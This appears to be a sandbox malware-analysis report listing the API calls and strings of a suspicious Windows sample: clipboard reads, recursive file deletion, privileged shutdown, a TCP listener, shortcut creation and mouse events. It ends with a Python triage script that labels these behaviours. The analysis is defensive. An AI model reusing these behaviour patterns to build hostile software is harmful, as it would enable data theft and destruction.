• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 4175595110-0
APIs
• OpenClipboard.USER32(00DECC08), ref: 00DCEB29
• IsClipboardFormatAvailable.USER32(0000000D), ref: 00DCEB37
• GetClipboardData.USER32(0000000D), ref: 00DCEB43
• CloseClipboard.USER32 ref: 00DCEB4F
• GlobalLock.KERNEL32(00000000), ref: 00DCEB87
• CloseClipboard.USER32 ref: 00DCEB91
• GlobalUnlock.KERNEL32(00000000), ref: 00DCEBBC
• IsClipboardFormatAvailable.USER32(00000001), ref: 00DCEBC9
• GetClipboardData.USER32(00000001), ref: 00DCEBD1
• GlobalLock.KERNEL32(00000000), ref: 00DCEBE2
• GlobalUnlock.KERNEL32(00000000), ref: 00DCEC22
• IsClipboardFormatAvailable.USER32(0000000F), ref: 00DCEC38
• GetClipboardData.USER32(0000000F), ref: 00DCEC44
• GlobalLock.KERNEL32(00000000), ref: 00DCEC55
• DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00DCEC77
• DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00DCEC94
• DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00DCECD2
• GlobalUnlock.KERNEL32(00000000), ref: 00DCECF3
• CountClipboardFormats.USER32 ref: 00DCED14
• CloseClipboard.USER32 ref: 00DCED59
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
• String ID:
• API String ID: 420908878-0
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00DC69BE
• FindClose.KERNEL32(00000000), ref: 00DC6A12
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DC6A4E
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DC6A75
  • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00DC6AB2
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00DC6ADF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
• String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
• API String ID: 3830820486-3289030164
APIs
• FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00DC9663
• GetFileAttributesW.KERNEL32(?), ref: 00DC96A1
• SetFileAttributesW.KERNEL32(?,?), ref: 00DC96BB
• FindNextFileW.KERNEL32(00000000,?), ref: 00DC96D3
• FindClose.KERNEL32(00000000), ref: 00DC96DE
• FindFirstFileW.KERNEL32(*.*,?), ref: 00DC96FA
• SetCurrentDirectoryW.KERNEL32(?), ref: 00DC974A
• SetCurrentDirectoryW.KERNEL32(00E16B7C), ref: 00DC9768
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00DC9772
• FindClose.KERNEL32(00000000), ref: 00DC977F
• FindClose.KERNEL32(00000000), ref: 00DC978F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1409584000-438819550
APIs
• FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00DC97BE
• FindNextFileW.KERNEL32(00000000,?), ref: 00DC9819
• FindClose.KERNEL32(00000000), ref: 00DC9824
• FindFirstFileW.KERNEL32(*.*,?), ref: 00DC9840
• SetCurrentDirectoryW.KERNEL32(?), ref: 00DC9890
• SetCurrentDirectoryW.KERNEL32(00E16B7C), ref: 00DC98AE
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00DC98B8
• FindClose.KERNEL32(00000000), ref: 00DC98C5
• FindClose.KERNEL32(00000000), ref: 00DC98D5
  • Part of subcall function 00DBDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00DBDB00
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 2640511053-438819550
APIs
• GetLocalTime.KERNEL32(?), ref: 00DC8257
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00DC8267
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DC8273
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DC8310
• SetCurrentDirectoryW.KERNEL32(?), ref: 00DC8324
• SetCurrentDirectoryW.KERNEL32(?), ref: 00DC8356
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00DC838C
• SetCurrentDirectoryW.KERNEL32(?), ref: 00DC8395
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local$System
• String ID: *.*
• API String ID: 1464919966-438819550
APIs
  • Part of subcall function 00D53AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D53A97,?,?,00D52E7F,?,?,?,00000000), ref: 00D53AC2
  • Part of subcall function 00DBE199: GetFileAttributesW.KERNEL32(?,00DBCF95), ref: 00DBE19A
• FindFirstFileW.KERNEL32(?,?), ref: 00DBD122
• DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00DBD1DD
• MoveFileW.KERNEL32(?,?), ref: 00DBD1F0
• DeleteFileW.KERNEL32(?,?,?,?), ref: 00DBD20D
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00DBD237
  • Part of subcall function 00DBD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00DBD21C,?,?), ref: 00DBD2B2
• FindClose.KERNEL32(00000000,?,?,?), ref: 00DBD253
• FindClose.KERNEL32(00000000), ref: 00DBD264
Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
Similarity
• API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
• String ID: \*.*
• API String ID: 1946585618-1173974218
                                                                                                            • Opcode ID: 752bd73b1d9262fa68b2e40e1718061770a0da0a184f043b2e558fd97430643e
                                                                                                            • Instruction ID: 36846d380d62bce26be0602ef661a3198d57e5a5ed34425316b6ec9865c3d69c
                                                                                                            • Opcode Fuzzy Hash: 752bd73b1d9262fa68b2e40e1718061770a0da0a184f043b2e558fd97430643e
                                                                                                            • Instruction Fuzzy Hash: 93615C3180125DEACF05EBA4C9929EDBBB6EF15341F644165E80277192EB30AF09CB70
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1737998785-0
                                                                                                            • Opcode ID: 7a5496f5f49c3dea2099ca5f980d5c0faae5bb73f016d8b33e7a258b95013df6
                                                                                                            • Instruction ID: 3833c21e22ff719643db212a085b17bf55233730cdb4f401cfbe22ee28e07afe
                                                                                                            • Opcode Fuzzy Hash: 7a5496f5f49c3dea2099ca5f980d5c0faae5bb73f016d8b33e7a258b95013df6
                                                                                                            • Instruction Fuzzy Hash: 8341AC71204252AFD720EF15D888F1ABBA5EF44358F18C09DE8168F762C735ED42CBA0
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DB16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DB170D
                                                                                                              • Part of subcall function 00DB16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DB173A
                                                                                                              • Part of subcall function 00DB16C3: GetLastError.KERNEL32 ref: 00DB174A
                                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00DBE932
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                            • String ID: $ $@$SeShutdownPrivilege
                                                                                                            • API String ID: 2234035333-3163812486
                                                                                                            • Opcode ID: 4f8a609394a60dac6c862d026fcf985c9d291dc3ed0932f0f76f156e34f05f17
                                                                                                            • Instruction ID: cc56c3be2a14b8c223c9e30e98ba2497402ded0b8523fc8ed03fe25a26a8e337
                                                                                                            • Opcode Fuzzy Hash: 4f8a609394a60dac6c862d026fcf985c9d291dc3ed0932f0f76f156e34f05f17
                                                                                                            • Instruction Fuzzy Hash: 9D018F72620311EBEF6827B49C86BFE739CA714750F190422F913E71D2D5A09C4889B4
                                                                                                            APIs
                                                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00DD1276
                                                                                                            • WSAGetLastError.WSOCK32 ref: 00DD1283
                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00DD12BA
                                                                                                            • WSAGetLastError.WSOCK32 ref: 00DD12C5
                                                                                                            • closesocket.WSOCK32(00000000), ref: 00DD12F4
                                                                                                            • listen.WSOCK32(00000000,00000005), ref: 00DD1303
                                                                                                            • WSAGetLastError.WSOCK32 ref: 00DD130D
                                                                                                            • closesocket.WSOCK32(00000000), ref: 00DD133C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 540024437-0
                                                                                                            • Opcode ID: 1212ebaf58eb9c63f62f1da95abc4c0c83d8c74fc37c3544213fb216dd7abaa6
                                                                                                            • Instruction ID: 02e9bd60b65a9530b08b04c6dde7d225181a2c9fb6d1e6bfcc951d15c92840dc
                                                                                                            • Opcode Fuzzy Hash: 1212ebaf58eb9c63f62f1da95abc4c0c83d8c74fc37c3544213fb216dd7abaa6
                                                                                                            • Instruction Fuzzy Hash: D1418E35600240AFD714EF64C5C9B29BBE5EF86318F188189E8568F392C771ED86CBB1
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D53AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D53A97,?,?,00D52E7F,?,?,?,00000000), ref: 00D53AC2
                                                                                                              • Part of subcall function 00DBE199: GetFileAttributesW.KERNEL32(?,00DBCF95), ref: 00DBE19A
                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00DBD420
                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00DBD470
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DBD481
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00DBD498
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00DBD4A1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                            • String ID: \*.*
                                                                                                            • API String ID: 2649000838-1173974218
                                                                                                            • Opcode ID: 2dee8502bfac49e5d41f56b096346f697820f7f7e24d452e8c4184dc554338b3
                                                                                                            • Instruction ID: 1c7d84580ec7558fe9539aabc7a98717b09aaf9f0fe17d85d979847691116adf
                                                                                                            • Opcode Fuzzy Hash: 2dee8502bfac49e5d41f56b096346f697820f7f7e24d452e8c4184dc554338b3
                                                                                                            • Instruction Fuzzy Hash: 35316F310183859BC604EF64D8918EFB7E8EE91315F444A2DF8D293191EB30EA0D8B72
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __floor_pentium4
                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                            • API String ID: 4168288129-2761157908
                                                                                                            • Opcode ID: 29e7824cfa44b1d465d13a82da6650ed19dc2de93f061ddfcb9cc93091b78330
                                                                                                            • Instruction ID: e4cdec681efa82414556bea950d8c56840669391569fa791a5fad8432e2456c4
                                                                                                            • Opcode Fuzzy Hash: 29e7824cfa44b1d465d13a82da6650ed19dc2de93f061ddfcb9cc93091b78330
                                                                                                            • Instruction Fuzzy Hash: 44C23C71E086288FDB25EF28DD407EAB7B5EB48305F1941EAD44DE7241E774AE818F60
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 00DC64DC
                                                                                                            • CoInitialize.OLE32(00000000), ref: 00DC6639
                                                                                                            • CoCreateInstance.OLE32(00DEFCF8,00000000,00000001,00DEFB68,?), ref: 00DC6650
                                                                                                            • CoUninitialize.OLE32 ref: 00DC68D4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                            • String ID: .lnk
                                                                                                            • API String ID: 886957087-24824748
                                                                                                            • Opcode ID: b56ccb85117341ab80976c514f8e17b519f3cd45c66e14010b8224f945ee3e35
                                                                                                            • Instruction ID: bf00ad3c12745b05648b8755dc9d452eb72d4c31a19a8c342646de0762e25af0
                                                                                                            • Opcode Fuzzy Hash: b56ccb85117341ab80976c514f8e17b519f3cd45c66e14010b8224f945ee3e35
                                                                                                            • Instruction Fuzzy Hash: 5FD15771518301AFC704EF24C881E6BB7E9EF98305F14496DF9958B291EB30E909CBB2
                                                                                                            APIs
                                                                                                            • GetForegroundWindow.USER32(?,?,00000000), ref: 00DD22E8
                                                                                                              • Part of subcall function 00DCE4EC: GetWindowRect.USER32(?,?), ref: 00DCE504
                                                                                                            • GetDesktopWindow.USER32 ref: 00DD2312
                                                                                                            • GetWindowRect.USER32(00000000), ref: 00DD2319
                                                                                                            • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00DD2355
                                                                                                            • GetCursorPos.USER32(?), ref: 00DD2381
                                                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00DD23DF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                            • String ID:
                                                                                                            • API String ID: 2387181109-0
                                                                                                            • Opcode ID: c40d358fd3c1869a29c3c6657c2d56856c620f7f20992934b6ec81398b547139
                                                                                                            • Instruction ID: 44ac6c6e6456559298b898611378b1081153521bdb794aa96a080808e85cbbbd
                                                                                                            • Opcode Fuzzy Hash: c40d358fd3c1869a29c3c6657c2d56856c620f7f20992934b6ec81398b547139
                                                                                                            • Instruction Fuzzy Hash: D231CF72504355ABCB20DF14C845FABB7A9FF84310F00091EF995DB291DB34E909CBA2
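The entries above are raw Joe Sandbox IDA-plugin output: per function, the imported API calls with their static arguments, the referenced strings, and similarity hashes. As an added example (not part of the report and not Joe Sandbox tooling), the following Python script parses that listing format and tags each function with a triage label derived from the API chains and strings visible on this page: LookupPrivilegeValueW/AdjustTokenPrivileges/ExitWindowsEx next to `SeShutdownPrivilege`, socket/bind/listen, the FindFirstFileW/DeleteFileW/FindNextFileW loop over `\*.*`, CoCreateInstance next to `.lnk`, mouse_event, and the `Clipboard$...` API ID. The label names and the rule table are this example's own assumptions; the sample input is excerpted from the entries above. The two argument decoders rely on documented Windows constants (AF_INET=2, SOCK_STREAM=1, IPPROTO_TCP=6; MOUSEEVENTF_MOVE=0x0001, MOUSEEVENTF_ABSOLUTE=0x8000), so `socket(2,1,6)` reads as an IPv4 TCP socket and `mouse_event(0x8001,...)` as an absolute cursor move.

```python
import re
from dataclasses import dataclass, field

# Line shapes taken from the listing above, e.g.
#   • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DBD237
#   • Part of subcall function 00DBD29C: CopyFileExW.KERNEL32(?,?), ref: 00DBD2B2
#   • WSAGetLastError.WSOCK32 ref: 00DD1283
API_LINE = re.compile(
    r"^•?\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>_*[A-Za-z][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
FIELD_LINE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)     # (name, module, args, ref, subcall addr)
    strings: list = field(default_factory=list)  # "String ID" field, '$'-separated
    api_id: str = ""

    def api_names(self):
        return {a[0] for a in self.apis}


def parse_listing(text):
    """Split an IDA-plugin listing into FunctionEntry objects; an 'APIs' heading opens each."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            cur.apis.append((m["name"], m["module"], m["args"] or "", m["ref"], m["sub"]))
            continue
        f = FIELD_LINE.match(line)
        if f and f["key"] == "String ID":
            cur.strings = [s for s in f["val"].split("$") if s.strip()]
        elif f and f["key"] == "API ID":
            cur.api_id = f["val"]
    return entries


# Triage rules (assumed, this example's own vocabulary): label, API names that must all
# be present, and a substring that must occur in the entry's strings or API ID.
RULES = [
    ("privileged-shutdown", {"AdjustTokenPrivileges", "ExitWindowsEx"}, "SeShutdownPrivilege"),
    ("tcp-listener", {"socket", "bind", "listen"}, None),
    ("recursive-file-delete", {"FindFirstFileW", "FindNextFileW", "DeleteFileW"}, "*.*"),
    ("recursive-file-copy", {"FindNextFileW", "CopyFileExW"}, "*.*"),
    ("shortcut-create", {"CoCreateInstance"}, ".lnk"),
    ("synthetic-mouse-input", {"mouse_event"}, None),
    ("clipboard-access", set(), "Clipboard"),
]


def classify(entry):
    names = entry.api_names()
    haystack = "$".join(entry.strings) + "$" + entry.api_id
    return [label for label, needed, needle in RULES
            if needed <= names and (needle is None or needle in haystack)]


# Documented Windows constants used by the two argument decoders.
MOUSEEVENTF = {0x0001: "MOUSEEVENTF_MOVE", 0x0002: "MOUSEEVENTF_LEFTDOWN",
               0x0004: "MOUSEEVENTF_LEFTUP", 0x8000: "MOUSEEVENTF_ABSOLUTE"}


def decode_mouse_event_flags(hexarg):
    value = int(hexarg, 16)
    return [name for bit, name in sorted(MOUSEEVENTF.items()) if value & bit]


def decode_socket_args(args):
    af, typ, proto = (int(x, 16) for x in args.split(",")[:3])
    return ({2: "AF_INET", 23: "AF_INET6"}.get(af, af),
            {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}.get(typ, typ),
            {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}.get(proto, proto))


def triage(text):
    """One summary per function entry: labels plus the raw API names and strings."""
    return [{"labels": classify(e), "apis": [a[0] for a in e.apis], "strings": e.strings}
            for e in parse_listing(text)]


# Excerpted from the function entries above, trimmed to the lines the rules inspect.
SAMPLE = """\
APIs
  • Part of subcall function 00DB16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DB173A
• ExitWindowsEx.USER32(?,00000000), ref: 00DBE932
• String ID: $ $@$SeShutdownPrivilege
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00DD1276
• WSAGetLastError.WSOCK32 ref: 00DD1283
• bind.WSOCK32(00000000,?,00000010), ref: 00DD12BA
• listen.WSOCK32(00000000,00000005), ref: 00DD1303
• API ID: ErrorLast$closesocket$bindlistensocket
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00DBD420
• DeleteFileW.KERNEL32(?,?,?,?), ref: 00DBD470
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00DBD481
• String ID: \\*.*
APIs
• CoCreateInstance.OLE32(00DEFCF8,00000000,00000001,00DEFB68,?), ref: 00DC6650
• String ID: .lnk
APIs
• mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00DD2355
APIs
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
"""

if __name__ == "__main__":
    for summary in triage(SAMPLE):
        print(summary["labels"], summary["apis"])
```

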